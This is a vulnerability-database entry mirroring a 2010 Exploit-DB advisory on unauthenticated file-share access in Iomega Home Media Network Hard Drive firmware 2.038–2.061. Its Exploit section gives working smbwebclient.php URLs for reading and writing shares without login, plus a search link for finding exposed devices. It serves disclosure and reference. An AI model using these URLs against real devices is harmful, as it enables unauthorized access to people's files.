Details of VAR-E-201004-1225

ID

VAR-E-201004-1225

EDB ID

12265

TITLE

Iomega Home Media Network Hard Drive 2.038 < 2.061 - File-system Access - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 12265

DESCRIPTION

Iomega Home Media Network Hard Drive 2.038 < 2.061 - File-system Access. CVE-64962 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 12265

AFFECTED PRODUCTS

vendor:	iomega	model:	home media network hard drive	scope:	eq	version:	2.038<2.061	Trust: 1.0
vendor:	iomega	model:	home media network hard drive	scope:	eq	version:	2.038	Trust: 0.6

sources: EXPLOIT-DB: 12265 // EDBNET: 35825

EXPLOIT

-----------------------------
Advisory
-----------------------------
Unauthenticated File-system Access in iomega Home Media Network Hard Drive

-----------------------------
Affected products
-----------------------------
iomega Home Media Network Hard Drive Firmware versions 2.038 - 2.061

-----------------------------
Timeline
-----------------------------
04.13.2010 - Discovered, disclosed to Bugtraq.

-----------------------------
Disclosure
-----------------------------
Full. Not disclosed to vendor due to latest firmware not being vulnerable.

-----------------------------
Details
-----------------------------
iomega chose to use smbwebclient to allow users of its product to
access files shared by the device via their web browser. However,
smbwebclient is in an unprotected directory allowing access without
authentication. smbwebclient grants the user full browser-based
read/write access to any visible shares on the device itself OR the
rest of the device's local network (assuming the shares' permissions
grant said access).

-----------------------------
Exploit
-----------------------------
View shares on device:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php?path=WORKGROUP%2F[DEVICE NAME]
(Device name is found in title of webpage on root directory of device)

View all shares on device's local network:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php

-----------------------------
Detection
-----------------------------
51 results returned in the following search on
ERIPP:http://eripp.com/?ipdb=1&search="Iomega"&sort=time&order=DESC&limit=20&submitbutton=Search

If device displays a slideshow on the root (home) page it is generally
firmware version 2.063 and is not vulnerable.

-----------------------------
References
-----------------------------
http://go.iomega.com/en-us/products/network-storage-desktop/home-network-hard-drives/home-media/?partner=4760
http://smbwebclient.sourceforge.net/2005/02/version-22.html
http://eripp.com/

Trust: 1.0

sources: EXPLOIT-DB: 12265

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 12265

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 12265

TYPE

File-system Access

Trust: 1.0

sources: EXPLOIT-DB: 12265

CREDITS

fizix610

Trust: 0.6

sources: EXPLOIT-DB: 12265

EXTERNAL IDS

db:	EXPLOIT-DB	id:	12265	Trust: 1.6
db:	EDBNET	id:	35825	Trust: 0.6

sources: EXPLOIT-DB: 12265 // EDBNET: 35825

REFERENCES

url:

https://www.exploit-db.com/exploits/12265/

Trust: 0.6

sources: EDBNET: 35825

SOURCES

db:	EXPLOIT-DB	id:	12265
db:	EDBNET	id:	35825

LAST UPDATE DATE

2022-07-27T09:48:03.070000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	12265	date:	2010-04-16T00:00:00
db:	EDBNET	id:	35825	date:	2010-04-16T00:00:00